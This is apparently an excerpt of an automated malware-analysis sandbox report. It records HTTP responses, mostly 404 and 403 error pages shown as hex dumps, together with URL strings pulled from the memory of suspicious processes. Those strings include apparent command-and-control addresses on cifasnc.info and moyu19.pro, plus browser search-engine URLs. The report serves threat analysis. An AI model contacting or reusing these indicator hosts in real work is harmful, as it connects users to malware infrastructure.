              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 14:13:04 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</s
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 14:13:07 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</s
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 14:13:09 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404">
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Sun, 12 Jan 2025 22:12:40 GMTContent-Type: text/htmlContent-Length: 166Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Sun, 12 Jan 2025 22:12:42 GMTContent-Type: text/htmlContent-Length: 166Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Sun, 12 Jan 2025 22:12:45 GMTContent-Type: text/htmlContent-Length: 166Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 12 Jan 2025 22:12:47 GMTContent-Type: text/htmlContent-Length: 0Connection: close
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 146Content-Type: text/htmlDate: Mon, 13 Jan 2025 14:13:43 GMTServer: nginxX-Cache: BYPASSConnection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 146Content-Type: text/htmlDate: Mon, 13 Jan 2025 14:13:45 GMTServer: nginxX-Cache: BYPASSConnection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 146Content-Type: text/htmlDate: Mon, 13 Jan 2025 14:13:48 GMTServer: nginxX-Cache: BYPASSConnection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 146Content-Type: text/htmlDate: Mon, 13 Jan 2025 14:13:50 GMTServer: nginxX-Cache: BYPASSConnection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 13 Jan 2025 14:14:00 GMTTransfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 14:14:11 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closex-pingback: http://cifasnc.info/xmlrpc.phpexpires: Wed, 11 Jan 1984 05:00:00 GMTlast-modified: Mon, 13 Jan 2025 14:14:11 GMTcache-control: no-cache, must-revalidate, max-age=0pragma: no-cachevary: Accept-Encoding,User-Agentx-turbo-charged-by: LiteSpeedcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WztCxx0eK0vg2HKYMua7f25IHQr5jEqC68WM%2FZ2tposYXB%2Bn7Hwsr2CIf5mPTla9CnT%2FI81z9vGnJgBCWfNBdgwBFpvfiAvgO9txM8KLh9TZBMutm%2B6naSZRsLuWYeiY7jrh"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9015fdbf1e49c45c-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1673&min_rtt=1673&rtt_var=836&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=737&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 35 31 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 57 dd 6f dc 36 0c 7f ce 01 f9 1f 58 0d c8 b5 d8 7c 4e fa b1 15 ad ed a1 4b 1b ac 0f eb 82 a6 c5 b0 a7 41 67 d3 b6 16 59 52 24 f9 2e 07 ec 8f 1f 24 f9 f3 7a 4b ee 61 79 38 4b 24 c5 1f 49 91 14 93 3c 79 ff fb e5 97 3f af 3f 40 6d 1b 9e 2d 12 f7 81 82 e9 94 70 ab 09 70 2a aa 94 a0 88 be de 10 c7 45 5a 64 8b a4 41 4b 21 af a9 36 68 53 f2 f5 cb 55 f4 9a 40 9c 2d 12 cb 2c c7 ec 9a 56 08 42 5a 28 65 2b 0a f8 07 72 56 52 23 f2 15 13 a5 4c e2 20 Data Ascii: 51eWo6X|NKAgYR$.$zKay8K$I<y??@m-pp*EZdAK!6hSU@-,VBZ(e+rVR#L
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 14:14:13 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closex-pingback: http://cifasnc.info/xmlrpc.phpexpires: Wed, 11 Jan 1984 05:00:00 GMTlast-modified: Mon, 13 Jan 2025 14:14:13 GMTcache-control: no-cache, must-revalidate, max-age=0pragma: no-cachevary: Accept-Encoding,User-Agentx-turbo-charged-by: LiteSpeedcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FHWRhTN%2F%2BKdcKIs8bVUyZIHsBXF6lQFk5n3ppahO7ud0yFXWHYp8LTkLzNwLgbD9B0JCbTtWncBCwI0dj1laOH9sgpW8fHALVDziLWql0gvk7qBBT6huNKKd1r9%2FXW0wNyZj"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9015fdcf4bd55e70-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1583&min_rtt=1583&rtt_var=791&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=757&delivery_rate=0&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 35 31 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 57 dd 6f dc 36 0c 7f ce 01 f9 1f 58 0d c8 b5 d8 7c 4e fa b1 15 ad ed a1 4b 1b ac 0f eb 82 a6 c5 b0 a7 41 67 d3 b6 16 59 52 24 f9 2e 07 ec 8f 1f 24 f9 f3 7a 4b ee 61 79 38 4b 24 c5 1f 49 91 14 93 3c 79 ff fb e5 97 3f af 3f 40 6d 1b 9e 2d 12 f7 81 82 e9 94 70 ab 09 70 2a aa 94 a0 88 be de 10 c7 45 5a 64 8b a4 41 4b 21 af a9 36 68 53 f2 f5 cb 55 f4 9a 40 9c 2d 12 cb 2c c7 ec 9a 56 08 42 5a 28 65 2b 0a f8 07 72 56 52 23 f2 15 13 a5 4c e2 20 Data Ascii: 512Wo6X|NKAgYR$.$zKay8K$I<y??@m-pp*EZdAK!6hSU@-,VBZ(e+rVR#L
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 14:14:16 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closex-pingback: http://cifasnc.info/xmlrpc.phpexpires: Wed, 11 Jan 1984 05:00:00 GMTlast-modified: Mon, 13 Jan 2025 14:14:16 GMTcache-control: no-cache, must-revalidate, max-age=0pragma: no-cachevary: Accept-Encoding,User-Agentx-turbo-charged-by: LiteSpeedcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p%2BaLznEpSdqk%2F4rT0453YF2BVBhlZd%2FvKuH4kK%2FJtAvCbILR4fi70jaHf7BMt7HxjYc76wZt1ENhx2PgpeDKJvlLBV6t2egXNgAGRXqbI6ZRXPV5FRmSXVkR6WFuTxIx8uJ5"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9015fddf0e82efa5-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1898&min_rtt=1898&rtt_var=949&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1774&delivery_rate=0&cwnd=210&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 35 31 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 57 dd 6f dc 36 0c 7f ce 01 f9 1f 58 0d c8 b5 d8 7c 4e fa b1 15 ad ed a1 4b 1b ac 0f eb 82 a6 c5 b0 a7 41 67 d3 b6 16 59 52 24 f9 2e 07 ec 8f 1f 24 f9 f3 7a 4b ee 61 79 38 4b 24 c5 1f 49 91 14 93 3c 79 ff fb e5 97 3f af 3f 40 6d 1b 9e 2d 12 f7 81 82 e9 94 70 ab 09 70 2a aa 94 a0 88 be de 10 c7 45 5a 64 8b a4 41 4b 21 af a9 36 68 53 f2 f5 cb 55 f4 9a 40 9c 2d 12 cb 2c c7 ec 9a 56 08 42 5a 28 65 2b 0a f8 07 72 56 52 23 f2 15 13 a5 4c e2 Data Ascii: 51eWo6X|NKAgYR$.$zKay8K$I<y??@m-pp*EZdAK!6hSU@-,VBZ(e+rVR#L
              Source: fc.exe, 00000004.00000002.3864506422.0000000004EE6000.00000004.10000000.00040000.00000000.sdmp, XcmmvCqVSCAb.exe, 00000007.00000002.3862506319.0000000003B86000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://cifasnc.info/8rr3/?60q4=iJ8hmWjdEFuk0u06tRtBw99RNA0cmJToU8wTtz6qpCRnWDAwsuGK654yLyD0CfrWg
              Source: fc.exe, 00000004.00000002.3864506422.0000000004EE6000.00000004.10000000.00040000.00000000.sdmp, XcmmvCqVSCAb.exe, 00000007.00000002.3862506319.0000000003B86000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://cifasnc.info/xmlrpc.php
              Source: XcmmvCqVSCAb.exe, 00000007.00000002.3864456444.0000000004E05000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.moyu19.pro
              Source: XcmmvCqVSCAb.exe, 00000007.00000002.3864456444.0000000004E05000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.moyu19.pro/b9e2/
              Source: fc.exe, 00000004.00000003.1993037096.0000000007EAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: fc.exe, 00000004.00000003.1993037096.0000000007EAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: fc.exe, 00000004.00000003.1993037096.0000000007EAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: fc.exe, 00000004.00000003.1993037096.0000000007EAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: fc.exe, 00000004.00000003.1993037096.0000000007EAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
